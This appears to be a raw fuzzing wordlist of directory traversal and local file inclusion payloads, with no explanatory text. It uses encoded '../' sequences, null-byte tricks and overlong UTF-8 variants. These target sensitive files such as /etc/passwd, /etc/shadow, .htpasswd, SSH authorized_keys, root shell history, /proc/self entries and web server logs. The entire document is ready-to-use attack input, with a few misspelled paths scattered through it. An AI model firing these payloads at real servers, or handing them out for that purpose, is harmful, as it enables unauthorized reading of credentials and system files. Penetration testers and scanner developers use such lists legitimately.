../../../../../../../../../../../../boot.ini%00
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini%00
|
||||
/../../../../../../../../../../../boot.ini%00.html
|
||||
/../../../../../../../../../../../boot.ini%00.jpg
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
|
||||
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
||||
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
|
||||
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
|
||||
c:\apache\logs\access.log
|
||||
c:\apache\logs\error.log
|
||||
c:\AppServ\MySQL
|
||||
C:/boot.ini
|
||||
C:\boot.ini
|
||||
/C:/inetpub/ftproot/
|
||||
C:/inetpub/wwwroot/global.asa
|
||||
C:\inetpub\wwwroot\global.asa
|
||||
c:\inetpub\wwwroot\index.asp
|
||||
/config.asp
|
||||
../config.asp
|
||||
config.asp
|
||||
../config.inc.php
|
||||
config.inc.php
|
||||
../config.js
|
||||
config.js
|
||||
_config.php
|
||||
../_config.php
|
||||
../config.php
|
||||
config.php
|
||||
../_config.php%00
|
||||
../../../../../../../../conf/server.xml
|
||||
/core/config.php
|
||||
/C:\Program Files\
|
||||
c:\Program Files\Apache Group\Apache\logs\access.log
|
||||
c:\Program Files\Apache Group\Apache\logs\error.log
|
||||
/.cshrc
|
||||
c:\System32\Inetsrv\metabase.xml
|
||||
c:WINDOWS/system32/
|
||||
d:\AppServ\MySQL
|
||||
database.asp
|
||||
database.js
|
||||
database.php
|
||||
data.php
|
||||
dbase.php a
|
||||
db.php
|
||||
../../../../../../../dev
|
||||
/D:\Program Files\
|
||||
d:\System32\Inetsrv\metabase.xml
|
||||
/etc/apache2/apache2.conf
|
||||
/etc/apache2/conf/httpd.conf
|
||||
/etc/apache2/httpd.conf
|
||||
/etc/apache2/sites-available/default
|
||||
/etc/apache2/vhosts.d/default_vhost.include
|
||||
/etc/apache/apache.conf
|
||||
/etc/apache/conf/httpd.conf
|
||||
/etc/apache/httpd.conf
|
||||
/etc/apt/sources.list
|
||||
/etc/chrootUsers
|
||||
/etc/crontab
|
||||
/etc/defaultdomain
|
||||
/etc/default/passwd
|
||||
/etc/defaultrouter
|
||||
/etc/fstab
|
||||
/etc/ftpchroot
|
||||
/etc/ftphosts
|
||||
/etc/group
|
||||
/etc/hostname.bge
|
||||
/etc/hostname.ce0
|
||||
/etc/hostname.ce1
|
||||
/etc/hostname.ce2
|
||||
/etc/hostname.ce3
|
||||
/etc/hostname.dcelx0
|
||||
/etc/hostname.dcelx1
|
||||
/etc/hostname.dcelx2
|
||||
/etc/hostname.dcelx3
|
||||
/etc/hostname.dmfe0
|
||||
/etc/hostname.dmfe1
|
||||
/etc/hostname.dmfe2
|
||||
/etc/hostname.dmfe3
|
||||
/etc/hostname.dnet0
|
||||
/etc/hostname.dnet1
|
||||
/etc/hostname.dnet2
|
||||
/etc/hostname.dnet3
|
||||
/etc/hostname.ecn0
|
||||
/etc/hostname.ecn1
|
||||
/etc/hostname.ecn2
|
||||
/etc/hostname.ecn3
|
||||
/etc/hostname.elx0
|
||||
/etc/hostname.elx1
|
||||
/etc/hostname.elx2
|
||||
/etc/hostname.elx3
|
||||
/etc/hostname.elxl0
|
||||
/etc/hostname.elxl1
|
||||
/etc/hostname.elxl2
|
||||
/etc/hostname.elxl3
|
||||
/etc/hostname.eri0
|
||||
/etc/hostname.eri1
|
||||
/etc/hostname.eri2
|
||||
/etc/hostname.eri3
|
||||
/etc/hostname.ge0
|
||||
/etc/hostname.ge1
|
||||
/etc/hostname.ge2
|
||||
/etc/hostname.ge3
|
||||
/etc/hostname.hme0
|
||||
/etc/hostname.hme1
|
||||
/etc/hostname.hme2
|
||||
/etc/hostname.hme3
|
||||
/etc/hostname.ieef0
|
||||
/etc/hostname.ieef1
|
||||
/etc/hostname.ieef2
|
||||
/etc/hostname.ieef3
|
||||
/etc/hostname.iprb0
|
||||
/etc/hostname.iprb1
|
||||
/etc/hostname.iprb2
|
||||
/etc/hostname.iprb3
|
||||
/etc/hostname.le0
|
||||
/etc/hostname.le1
|
||||
/etc/hostname.le2
|
||||
/etc/hostname.le3
|
||||
/etc/hostname.lo
|
||||
/etc/hostname.pcn0
|
||||
/etc/hostname.pcn1
|
||||
/etc/hostname.pcn2
|
||||
/etc/hostname.pcn3
|
||||
/etc/hostname.qfe0
|
||||
/etc/hostname.qfe1
|
||||
/etc/hostname.qfe2
|
||||
/etc/hostname.qfe3
|
||||
/etc/hostname.spwr0
|
||||
/etc/hostname.spwr1
|
||||
/etc/hostname.spwr2
|
||||
/etc/hostname.spwr3
|
||||
/etc/hosts
|
||||
../../../../../../../../../../../../etc/hosts
|
||||
../../../../../../../../../../../../etc/hosts%00
|
||||
/etc/hosts.allow
|
||||
/etc/hosts.deny
|
||||
/etc/hosts.equiv
|
||||
/etc/http/conf/httpd.conf
|
||||
/etc/httpd.conf
|
||||
/etc/httpd/conf.d/php.conf
|
||||
/etc/httpd/conf.d/squirrelmail.conf
|
||||
/etc/httpd/conf.d/ssl.conf
|
||||
/etc/httpd/conf/httpd.conf
|
||||
/etc/httpd/httpd.conf
|
||||
/etc/httpd/logs/acces_log
|
||||
/etc/httpd/logs/acces.log
|
||||
../../../../../../../etc/httpd/logs/acces_log
|
||||
../../../../../../../etc/httpd/logs/acces.log
|
||||
/etc/httpd/logs/access_log
|
||||
/etc/httpd/logs/access.log
|
||||
../../../../../etc/httpd/logs/access_log
|
||||
../../../../../etc/httpd/logs/access.log
|
||||
/etc/httpd/logs/error_log
|
||||
/etc/httpd/logs/error.log
|
||||
../../../../../../../etc/httpd/logs/error_log
|
||||
../../../../../../../etc/httpd/logs/error.log
|
||||
../../../../../etc/httpd/logs/error_log
|
||||
../../../../../etc/httpd/logs/error.log
|
||||
/etc/httpd/php.ini
|
||||
/etc/http/httpd.conf
|
||||
/etc/inetd.conf
|
||||
/etc/init.d/apache
|
||||
/etc/init.d/apache2
|
||||
/etc/issue
|
||||
/etc/logrotate.d/ftp
|
||||
/etc/logrotate.d/httpd
|
||||
/etc/logrotate.d/proftpd
|
||||
/etc/logrotate.d/vsftpd.log
|
||||
/etc/mail/access
|
||||
/etc/mailman/mm_cfg.py
|
||||
/etc/make.conf
|
||||
/etc/master.passwd
|
||||
/etc/motd
|
||||
/etc/my.cnf
|
||||
/etc/mysql/my.cnf
|
||||
/etc/netconfig
|
||||
/etc/nsswitch.conf
|
||||
/etc/opt/ipf/ipf.conf
|
||||
/etc/opt/ipf/ipnat.conf
|
||||
/./././././././././././etc/passwd
|
||||
/../../../../../../../../../../etc/passwd
|
||||
/../../../../../../../../../../etc/passwd^^
|
||||
/..\../..\../..\../..\../..\../..\../etc/passwd
|
||||
/etc/passwd
|
||||
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../etc/passwd
|
||||
../../../../../../../../etc/passwd
|
||||
../../../../../../../etc/passwd
|
||||
../../../../../../etc/passwd
|
||||
../../../../../etc/passwd
|
||||
../../../../etc/passwd
|
||||
../../../etc/passwd
|
||||
../../etc/passwd
|
||||
../etc/passwd
|
||||
..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\passwd
|
||||
etc/passwd
|
||||
/etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../../etc/passwd%00
|
||||
../../../../../../../../etc/passwd%00
|
||||
../../../../../../../etc/passwd%00
|
||||
../../../../../../etc/passwd%00
|
||||
../../../../../etc/passwd%00
|
||||
../../../../etc/passwd%00
|
||||
../../../etc/passwd%00
|
||||
../../etc/passwd%00
|
||||
../etc/passwd%00
|
||||
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
||||
/../../../../../../../../../../../etc/passwd%00.html
|
||||
/../../../../../../../../../../../etc/passwd%00.jpg
|
||||
../../../../../../etc/passwd&=%3C%3C%3C%3C
|
||||
/etc/php4.4/fcgi/php.ini
|
||||
/etc/php4/apache2/php.ini
|
||||
/etc/php4/apache/php.ini
|
||||
/etc/php4/cgi/php.ini
|
||||
/etc/php5/apache2/php.ini
|
||||
/etc/php5/apache/php.ini
|
||||
/etc/php5/cgi/php.ini
|
||||
/etc/php/apache2/php.ini
|
||||
/etc/php/apache/php.ini
|
||||
/etc/php/cgi/php.ini
|
||||
/etc/php.d/dom.ini
|
||||
/etc/php.d/gd.ini
|
||||
/etc/php.d/imap.ini
|
||||
/etc/php.d/json.ini
|
||||
/etc/php.d/ldap.ini
|
||||
/etc/php.d/mbstring.ini
|
||||
/etc/php.d/mysqli.ini
|
||||
/etc/php.d/mysql.ini
|
||||
/etc/php.d/odbc.ini
|
||||
/etc/php.d/pdo.ini
|
||||
/etc/php.d/pdo_mysql.ini
|
||||
/etc/php.d/pdo_odbc.ini
|
||||
/etc/php.d/pdo_pgsql.ini
|
||||
/etc/php.d/pdo_sqlite.ini
|
||||
/etc/php.d/pgsql.ini
|
||||
/etc/php.d/xmlreader.ini
|
||||
/etc/php.d/xmlwriter.ini
|
||||
/etc/php.d/xsl.ini
|
||||
/etc/php.d/zip.ini
|
||||
/etc/php.ini
|
||||
/etc/php/php4/php.ini
|
||||
/etc/php/php.ini
|
||||
/etc/postfix/mydomains
|
||||
/etc/proftp.conf
|
||||
/etc/proftpd/modules.conf
|
||||
/etc/protpd/proftpd.conf
|
||||
/etc/pure-ftpd.conf
|
||||
/etc/pureftpd.passwd
|
||||
/etc/pureftpd.pdb
|
||||
/etc/pure-ftpd/pure-ftpd.conf
|
||||
/etc/pure-ftpd/pure-ftpd.pdb
|
||||
/etc/pure-ftpd/pureftpd.pdb
|
||||
/etc/release
|
||||
/etc/resolv.conf
|
||||
/etc/rpc
|
||||
/etc/security/environ
|
||||
/etc/security/failedlogin
|
||||
/etc/security/group
|
||||
/etc/security/lastlog
|
||||
/etc/security/limits
|
||||
/etc/security/passwd
|
||||
/etc/security/user
|
||||
/./././././././././././etc/shadow
|
||||
/../../../../../../../../../../etc/shadow
|
||||
/../../../../../../../../../../etc/shadow^^
|
||||
/..\../..\../..\../..\../..\../..\../etc/shadow
|
||||
/etc/shadow
|
||||
../../../../../../../../../../../../etc/shadow
|
||||
..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\shadow
|
||||
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
|
||||
../../../../../../../../../../../../etc/shadow%00
|
||||
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
||||
etc/shadow%00
|
||||
/etc/ssh/sshd_config
|
||||
/etc/sudoers
|
||||
/etc/syslog.conf
|
||||
/etc/syslogd.conf
|
||||
/etc/system
|
||||
/etc/updatedb.conf
|
||||
/etc/utmp
|
||||
/etc/vfstab
|
||||
/etc/vhcs2/proftpd/proftpd.conf
|
||||
/etc/vsftpd.chroot_list
|
||||
/etc/vsftpd.conf
|
||||
/etc/vsftpd/vsftpd.conf
|
||||
/etc/wtmp
|
||||
/etc/wu-ftpd/ftpaccess
|
||||
/etc/wu-ftpd/ftphosts
|
||||
/etc/wu-ftpd/ftpusers
|
||||
/.forward
|
||||
/home2\bin\stable\apache\php.ini
|
||||
/home/apache/conf/httpd.conf
|
||||
/home/apache/httpd.conf
|
||||
/home\bin\stable\apache\php.ini
|
||||
/.htpasswd
|
||||
.htpasswd
|
||||
../.htpasswd
|
||||
../install.php
|
||||
install.php
|
||||
../../../../../../../../../../../../localstart.asp
|
||||
../../../../../../../../../../../../localstart.asp%00
|
||||
/log/miscDir/accesslog
|
||||
/.logout
|
||||
/logs/access_log
|
||||
/logs/access.log
|
||||
../../../../../logs/access.log
|
||||
../../../../logs/access.log
|
||||
../../../logs/access.log
|
||||
../../logs/access.log
|
||||
../logs/access.log
|
||||
/logs/error_log
|
||||
/logs/error.log
|
||||
../../../../../logs/error.log
|
||||
../../../../logs/error.log
|
||||
../../../logs/error.log
|
||||
../../logs/error.log
|
||||
../logs/error.log
|
||||
/logs/pure-ftpd.log
|
||||
/master.passwd
|
||||
member/.htpasswd
|
||||
members/.htpasswd
|
||||
/.netrc
|
||||
/NetServer\bin\stable\apache\php.ini
|
||||
/opt/apache2/conf/httpd.conf
|
||||
/opt/apache/conf/httpd.conf
|
||||
/opt/lampp/logs/access_log
|
||||
/opt/lampp/logs/access.log
|
||||
/opt/lampp/logs/error_log
|
||||
/opt/lampp/logs/error.log
|
||||
/opt/xampp/etc/php.ini
|
||||
/opt/xampp/logs/access_log
|
||||
/opt/xampp/logs/access.log
|
||||
/opt/xampp/logs/error_log
|
||||
/opt/xampp/logs/error.log
|
||||
.pass
|
||||
../.pass
|
||||
pass.dat
|
||||
passwd
|
||||
/.passwd
|
||||
.passwd
|
||||
../.passwd
|
||||
passwd.dat
|
||||
/php4\php.ini
|
||||
/php5\php.ini
|
||||
/php\php.ini
|
||||
/PHP\php.ini
|
||||
/private/etc/httpd/httpd.conf
|
||||
/private/etc/httpd/httpd.conf.default
|
||||
/proc/cpuinfo
|
||||
/proc/interrupts
|
||||
/proc/loadavg
|
||||
/proc/meminfo
|
||||
/proc/mounts
|
||||
/proc/net/arp
|
||||
/proc/net/dev
|
||||
/proc/net/route
|
||||
/proc/net/tcp
|
||||
/proc/partitions
|
||||
/proc/self/cmdline
|
||||
/proc/self/envron
|
||||
/proc/version
|
||||
/.profile
|
||||
/Program Files\Apache Group\Apache2\conf\httpd.conf
|
||||
/Program Files\Apache Group\Apache\conf\httpd.conf
|
||||
/Program Files\Apache Group\Apache\logs\access.log
|
||||
/Program Files\Apache Group\Apache\logs\error.log
|
||||
/Program Files\xampp\apache\conf\httpd.conf
|
||||
/../../../../pswd
|
||||
/.rhosts
|
||||
/root/.bash_history
|
||||
/root/.bash_logut
|
||||
root/.htpasswd
|
||||
/root/.ksh_history
|
||||
/root/.Xauthority
|
||||
/.sh_history
|
||||
/.shosts
|
||||
/.ssh/authorized_keys
|
||||
user/.htpasswd
|
||||
../users.db.php
|
||||
users.db.php
|
||||
users/.htpasswd
|
||||
/usr/apache2/conf/httpd.conf
|
||||
/usr/apache/conf/httpd.conf
|
||||
/usr/etc/pure-ftpd.conf
|
||||
/usr/lib/cron/log
|
||||
/usr/lib/php.ini
|
||||
/usr/lib/php/php.ini
|
||||
/usr/lib/security/mkuser.default
|
||||
/usr/local/apache2/conf/httpd.conf
|
||||
/usr/local/apache2/httpd.conf
|
||||
/usr/local/apache2/logs/access_log
|
||||
/usr/local/apache2/logs/access.log
|
||||
/usr/local/apache2/logs/error_log
|
||||
/usr/local/apache2/logs/error.log
|
||||
/usr/local/apache/conf/httpd.conf
|
||||
/usr/local/apache/conf/php.ini
|
||||
/usr/local/apache/httpd.conf
|
||||
/usr/local/apache/log
|
||||
/usr/local/apache/logs
|
||||
/usr/local/apache/logs/access_log
|
||||
/usr/local/apache/logs/access_ log
|
||||
/usr/local/apache/logs/access.log
|
||||
/usr/local/apache/logs/access. log
|
||||
../../../../../../../usr/local/apache/logs/access_ log
|
||||
../../../../../../../usr/local/apache/logs/access. log
|
||||
../../../../../usr/local/apache/logs/access_log
|
||||
../../../../../usr/local/apache/logs/access.log
|
||||
/usr/local/apache/logs/error_log
|
||||
/usr/local/apache/logs/error.log
|
||||
../../../../../../../usr/local/apache/logs/error_l og
|
||||
../../../../../../../usr/local/apache/logs/error.l og
|
||||
../../../../../usr/local/apache/logs/error_log
|
||||
../../../../../usr/local/apache/logs/error.log
|
||||
/usr/local/apps/apache2/conf/httpd.conf
|
||||
/usr/local/apps/apache/conf/httpd.conf
|
||||
/usr/local/cpanel/logs
|
||||
/usr/local/cpanel/logs/access_log
|
||||
/usr/local/cpanel/logs/error_log
|
||||
/usr/local/cpanel/logs/license_log
|
||||
/usr/local/cpanel/logs/login_log
|
||||
/usr/local/cpanel/logs/stats_log
|
||||
/usr/local/etc/apache2/conf/httpd.conf
|
||||
/usr/local/etc/apache/conf/httpd.conf
|
||||
/usr/local/etc/apache/vhosts.conf
|
||||
/usr/local/etc/httpd/conf/httpd.conf
|
||||
/usr/local/etc/httpd/logs/access_log
|
||||
/usr/local/etc/httpd/logs/error_log
|
||||
/usr/local/etc/php.ini
|
||||
/usr/local/etc/pure-ftpd.conf
|
||||
/usr/local/etc/pureftpd.pdb
|
||||
/usr/local/httpd/conf/httpd.conf
|
||||
/usr/local/lib/php.ini
|
||||
/usr/local/php4/httpd.conf
|
||||
/usr/local/php4/httpd.conf.php
|
||||
/usr/local/php4/lib/php.ini
|
||||
/usr/local/php5/httpd.conf
|
||||
/usr/local/php5/httpd.conf.php
|
||||
/usr/local/php5/lib/php.ini
|
||||
/usr/local/php/httpd.conf
|
||||
/usr/local/php/httpd.conf.php
|
||||
/usr/local/php/lib/php.ini
|
||||
/usr/local/pureftpd/etc/pure-ftpd.conf
|
||||
/usr/local/pureftpd/etc/pureftpd.pdb
|
||||
/usr/local/pureftpd/sbin/pure-config.pl
|
||||
/usr/local/www/logs/thttpd_log
|
||||
/usr/local/Zend/etc/php.ini
|
||||
/usr/pkgsrc/net/pureftpd/
|
||||
/usr/ports/contrib/pure-ftpd/
|
||||
/usr/ports/ftp/pure-ftpd/
|
||||
/usr/ports/net/pure-ftpd/
|
||||
/usr/sbin/pure-config.pl
|
||||
/usr/spool/lp/log
|
||||
/usr/spool/mqueue/syslog
|
||||
/var/adm
|
||||
/var/adm/acct/sum/loginlog
|
||||
/var/adm/aculog
|
||||
/var/adm/aculogs
|
||||
/var/adm/crash/unix
|
||||
/var/adm/crash/vmcore
|
||||
/var/adm/cron/log
|
||||
/var/adm/dtmp
|
||||
/var/adm/lastlog
|
||||
/var/adm/lastlog/username
|
||||
/var/adm/log/asppp.log
|
||||
/var/adm/loginlog
|
||||
/var/adm/log/xferlog
|
||||
/var/adm/lp/lpd-errs
|
||||
/var/adm/messages
|
||||
/var/adm/pacct
|
||||
/var/adm/qacct
|
||||
/var/adm/ras/bootlog
|
||||
/var/adm/ras/errlog
|
||||
/var/adm/sulog
|
||||
/var/adm/SYSLOG
|
||||
/var/adm/utmp
|
||||
/var/adm/utmpx
|
||||
/var/adm/vold.log
|
||||
/var/adm/wtmp
|
||||
/var/adm/wtmpx
|
||||
/var/adm/X0msgs
|
||||
/var/apache/log
|
||||
/var/apache/logs
|
||||
/var/apache/logs/access_log
|
||||
/var/apache/logs/error_log
|
||||
/var/cpanel/cpanel.config
|
||||
/var/cron/log
|
||||
/var/lib/mlocate/mlocate.db
|
||||
/var/lib/mysql/my.cnf
|
||||
/var/local/www/conf/php.ini
|
||||
/var/lock/samba
|
||||
/var/log
|
||||
/var/log/access_log
|
||||
/var/log/access.log
|
||||
../../../../../../../var/log/access_log
|
||||
../../../../../../../var/log/access.log
|
||||
../../../../../var/log/access_log
|
||||
/var/log/acct
|
||||
/var/log/apache2/access_log
|
||||
/var/log/apache2/access.log
|
||||
../../../../../../../var/log/apache2/access_log
|
||||
../../../../../../../var/log/apache2/access.log
|
||||
/var/log/apache2/error_log
|
||||
/var/log/apache2/error.log
|
||||
../../../../../../../var/log/apache2/error_log
|
||||
../../../../../../../var/log/apache2/error.log
|
||||
/var/log/apache/access_log
|
||||
/var/log/apache/access.log
|
||||
../../../../../../../var/log/apache/access_log
|
||||
../../../../../../../var/log/apache/access.log
|
||||
../../../../../var/log/apache/access_log
|
||||
../../../../../var/log/apache/access.log
|
||||
/var/log/apache/error_log
|
||||
/var/log/apache/error.log
|
||||
../../../../../../../var/log/apache/error_log
|
||||
../../../../../../../var/log/apache/error.log
|
||||
../../../../../var/log/apache/error_log
|
||||
../../../../../var/log/apache/error.log
|
||||
/var/log/apache-ssl/access.log
|
||||
/var/log/apache-ssl/error.log
|
||||
/var/log/auth
|
||||
/var/log/authlog
|
||||
/var/log/auth.log
|
||||
/var/log/boot.log
|
||||
/var/log/cron.log
|
||||
/var/log/dmesg
|
||||
/var/log/error_log
|
||||
/var/log/error.log
|
||||
../../../../../../../var/log/error_log
|
||||
../../../../../../../var/log/error.log
|
||||
../../../../../var/log/error_log
|
||||
/var/log/exim_mainlog
|
||||
/var/log/exim/mainlog
|
||||
/var/log/exim_paniclog
|
||||
/var/log/exim/paniclog
|
||||
/var/log/exim_rejectlog
|
||||
/var/log/exim/rejectlog
|
||||
/var/log/ftplog
|
||||
/var/log/ftp-proxy
|
||||
/var/log/ftp-proxy/ftp-proxy.log
|
||||
/var/log/httpd/
|
||||
/var/log/httpd/access_log
|
||||
/var/log/httpd/access.log
|
||||
../../../../../var/log/httpd/access_log
|
||||
/var/log/httpd/error_log
|
||||
/var/log/httpd/error.log
|
||||
../../../../../var/log/httpd/error_log
|
||||
/var/log/httpsd/ssl.access_log
|
||||
/var/log/httpsd/ssl_log
|
||||
/var/log/kern.log
|
||||
/var/log/lastlog
|
||||
/var/log/lighttpd
|
||||
/var/log/maillog
|
||||
/var/log/message
|
||||
/var/log/messages
|
||||
/var/log/mysqlderror.log
|
||||
/var/log/mysqld.log
|
||||
/var/log/mysql.log
|
||||
/var/log/mysql/mysql-bin.log
|
||||
/var/log/mysql/mysql.log
|
||||
/var/log/mysql/mysql-slow.log
|
||||
/var/log/ncftpd.errs
|
||||
/var/log/ncftpd/misclog.txt
|
||||
/var/log/news
|
||||
/var/log/news.all
|
||||
/var/log/news/news
|
||||
/var/log/news/news.all
|
||||
/var/log/news/news.crit
|
||||
/var/log/news/news.err
|
||||
/var/log/news/news.notice
|
||||
/var/log/news/suck.err
|
||||
/var/log/news/suck.notice
|
||||
/var/log/poplog
|
||||
/var/log/POPlog
|
||||
/var/log/proftpd
|
||||
/var/log/proftpd.access_log
|
||||
/var/log/proftpd.xferlog
|
||||
/var/log/proftpd/xferlog.legacy
|
||||
/var/log/pureftpd.log
|
||||
/var/log/pure-ftpd/pure-ftpd.log
|
||||
/var/log/qmail
|
||||
/var/log/qmail/
|
||||
/var/log/samba
|
||||
/var/log/samba-log.%m
|
||||
/var/log/secure
|
||||
/var/log/smtpd
|
||||
/var/log/spooler
|
||||
/var/log/syslog
|
||||
/var/log/telnetd
|
||||
/var/log/thttpd_log
|
||||
/var/log/utmp
|
||||
/var/log/vsftpd.log
|
||||
/var/log/wtmp
|
||||
/var/log/xferlog
|
||||
/var/log/yum.log
|
||||
/var/lp/logs/lpNet
|
||||
/var/lp/logs/lpsched
|
||||
/var/lp/logs/requests
|
||||
/var/mysql.log
|
||||
/var/run/httpd.pid
|
||||
/var/run/mysqld/mysqld.pid
|
||||
/var/run/utmp
|
||||
/var/saf/_log
|
||||
/var/saf/port/log
|
||||
/var/spool/errors
|
||||
/var/spool/locks
|
||||
/var/spool/logs
|
||||
/var/spool/tmp
|
||||
/var/www/conf/httpd.conf
|
||||
/var/www/html/.htaccess
|
||||
/var/www/localhost/htdocs/.htaccess
|
||||
/var/www/log/access_log
|
||||
/var/www/log/error_log
|
||||
/../../var/www/logs/access_log
|
||||
/var/www/logs/access_log
|
||||
/var/www/logs/access.log
|
||||
../../../../../../../var/www/logs/access_log
|
||||
../../../../../../../var/www/logs/access.log
|
||||
../../../../../var/www/logs/access.log
|
||||
/var/www/logs/error_log
|
||||
/var/www/logs/error.log
|
||||
../../../../../../../var/www/logs/error_log
|
||||
../../../../../../../var/www/logs/error.log
|
||||
../../../../../var/www/logs/error_log
|
||||
../../../../../var/www/logs/error.log
|
||||
/var/www/sitename/htdocs/
|
||||
/var/www/vhosts/sitename/httpdocs/.htaccess
|
||||
/var/www/web1/html/.htaccess
|
||||
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
|
||||
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
|
||||
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
|
||||
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
|
||||
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
|
||||
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
|
||||
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
|
||||
/Volumes/webBackup/opt/apache2/conf/httpd.conf
|
||||
/Volumes/webBackup/private/etc/httpd/httpd.conf
|
||||
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
|
||||
/web/conf/php.ini
|
||||
/WINDOWS\php.ini
|
||||
../../windows/win.ini
|
||||
/WINNT\php.ini
|
||||
/..\..\..\..\..\..\winnt\win.ini
|
||||
/www/logs/proftpd.system.log
|
||||
/xampp\apache\bin\php.ini
|
||||
/.Xauthority
|
||||
..2fapache2flogs2ferror.log
|
||||
..2fapache2flogs2faccess.log
|
||||
..2f..2fapache2flogs2ferror.log
|
||||
..2f..2fapache2flogs2faccess.log
|
||||
..2f..2f..2fapache2flogs2ferror.log
|
||||
..2f..2f..2fapache2flogs2faccess.log
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
|
||||
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log
|
||||
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
|
||||
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og
|
||||
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
|
||||
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log
|
||||
..2fetc2fpasswd
|
||||
..2fetc2fpasswd%00
|
||||
..2f..2fetc2fpasswd
|
||||
..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
|
||||
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
|
||||
